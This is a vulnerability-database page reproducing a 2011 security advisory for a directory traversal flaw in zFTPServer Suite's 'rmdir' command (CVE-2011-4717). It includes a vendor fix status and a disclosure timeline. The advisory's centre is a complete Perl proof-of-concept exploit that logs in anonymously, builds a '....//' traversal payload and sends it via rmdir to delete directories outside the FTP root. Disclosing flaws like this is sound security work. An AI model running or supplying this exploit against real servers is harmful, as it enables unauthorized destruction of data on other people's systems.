Vulmon Recent Vulnerabilities Research Posts Trends Blog About Contact

zFTPServer Suite 6.0.0.52 Directory Traversal

Related Vulnerabilities: CVE-2011-4717  
Publish Date: 12 Dec 2011
Author: Stefan Schurtz
Source 
                							

                Advisory:    zFTPServer Suite 6.0.0.52 'rmdir' Directory Traversal
Advisory ID:    INFOSERVE-ADV2011-09
Author:      Stefan Schurtz
Contact:    security@infoserve.de
Affected Software:  Successfully tested on zFTPServer Suite 6.0.0.52
Vendor URL:    http://www.zftpserver.com/
Vendor Status:    fixed
CVE-ID:      CVE-2011-4717

==========================
Vulnerability Description
==========================

zFTPServer 'rmdir' is prone to a Directory Traversal, which makes it possible to delete directories in the system

==================
PoC-Exploit
==================

Tested on: WindowsXP (SP3)
User Permissions:  Files->Read / Directories->List, Delete

#!/usr/bin/perl
#########################################################
# NOTE: This exploit is only for educational purpose!!! # 
#########################################################
use strict;
use Net::FTP;

my $user = "anonymous";
my $password = "anonymous@";

########################
# connect
########################
my $target = $ARGV[0];
my $plength = $ARGV[1];

print "\n";
print "\t#######################################################\n";
print "\t# This PoC-Exploit is only for educational purpose!!! #\n";
print "\t#######################################################\n";
print "\n";

if (!$ARGV[0]||!$ARGV[1]) {
  print "[+] Usage: $@ <target> <payload length>\n";
  exit 1;
}

my $ftp=Net::FTP->new($target,Timeout=>15) or die "Cannot connect to $target: $@";
print "[+] Connected to $target\n";

########################
# login
########################
$ftp->login($user,$password) or die "Cannot login ", $ftp->message;
print "[+] Logged in with user $user\n";

###################################################
# Building payload '....//' with min. length of 38
###################################################
my @p = ( "",".",".",".",".","/","/" );
my $payload;

print "[+] Building payload\n";

for (my $i=1;$i<=$plength;$i++) {
   $payload .= $p[$i];
   push(@p,$p[$i]);
}
sleep(3);

#########################################
# Sending payload
#########################################
print "[+] Sending payload $payload\n";
$ftp->rmdir($payload) or die "rmdir failed ", $ftp->message;

##########################################
# disconnect
##########################################
print "[+] Done\n";
$ftp->quit;
exit 0;
#EOF

=========
Solution
=========

Fixed, but no new release available, as a workaround disable "Directories->Delete"

====================
Disclosure Timeline
====================

04-Dec-2011 - informed vendor
06-Dec-2011 - fixed by vendor
10-Dec-2011 - release date of this security advisory

========
Credits
========

Vulnerabilitiy found and advisory written by the INFOSERVE security team.

===========
References
===========

http://forum.zftpserver.com/viewtopic.php?f=4&t=2927
http://www.infoserve.de/system/files/advisories/INFOSERVE-ADV2011-09.tx
<p>

Vulmon Search

Vulmon Search is a vulnerability search engine. It gives comprehensive vulnerability information through a very simple user interface.

About

Home Recent Vulnerabilities Research Posts Trends Blog About Contact

Products

Vulmon Search Vulmon Research Vulmon Alerts Vulmap

Connect

Twitter Reddit Linkedin Facebook

Vulnerability Notification Service
You don’t have to wait for vulnerability scanning results
Get Started